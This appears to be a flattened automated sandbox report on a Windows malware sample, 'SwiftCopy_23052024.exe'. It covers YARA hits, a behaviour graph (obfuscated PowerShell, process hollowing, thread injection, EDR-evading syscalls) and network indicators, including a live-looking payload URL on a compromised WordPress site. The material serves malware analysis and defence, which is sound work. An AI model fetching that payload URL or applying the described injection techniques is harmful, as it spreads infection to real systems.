Source: Yara match File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446510 Sample: SwiftCopy_23052024.exe Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 48 www.innovativebuildingsolutions.in 2->48 50 innovativebuildingsolutions.in 2->50 66 Multi AV Scanner detection for domain / URL 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Antivirus detection for URL or domain 2->70 72 5 other signatures 2->72 11 SwiftCopy_23052024.exe 30 2->11         started        signatures3 process4 file5 44 C:\Users\user\...\Venstrehaandsarbejdet.Uns, ASCII 11->44 dropped 84 Suspicious powershell command line found 11->84 15 powershell.exe 20 11->15         started        signatures6 process7 file8 46 C:\Users\user\AppData\...\Tabsgivende.exe, PE32 15->46 dropped 54 Obfuscated command line found 15->54 56 Writes to foreign memory regions 15->56 58 Sample uses process hollowing technique 15->58 60 2 other signatures 15->60 19 Tabsgivende.exe 2 7 15->19         started        23 conhost.exe 15->23         started        25 cmd.exe 1 15->25         started        signatures9 process10 dnsIp11 52 innovativebuildingsolutions.in 103.21.58.98, 443, 49706 PUBLIC-DOMAIN-REGISTRYUS United Arab Emirates 19->52 74 Multi AV Scanner detection for dropped file 19->74 76 Machine Learning detection for dropped file 19->76 78 Maps a DLL or memory area into another process 19->78 27 GjMghjdydYRuCpMLokUCwhVfwlj.exe 19->27 injected 30 cmd.exe 1 19->30         started        signatures12 process13 signatures14 82 Found direct / indirect Syscall (likely to bypass EDR) 27->82 32 wlanext.exe 27->32         started        35 Magnify.exe 27->35         started        37 conhost.exe 30->37         started        39 reg.exe 1 1 30->39         started        process15 signatures16 62 Maps a DLL or memory area into another process 32->62 64 Queues an APC in another process (thread injection) 32->64 41 GjMghjdydYRuCpMLokUCwhVfwlj.exe 32->41 injected process17 signatures18 80 Found direct / indirect Syscall (likely to bypass EDR) 41->80
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.21.58.98
 innovativebuildingsolutions.in United Arab Emirates
394695 PUBLIC-DOMAIN-REGISTRYUS false

Contacted Domains

Name IP Active
innovativebuildingsolutions.in 103.21.58.98 true
www.innovativebuildingsolutions.in unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.innovativebuildingsolutions.in/wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.bin false
  • Avira URL Cloud: safe
 unknown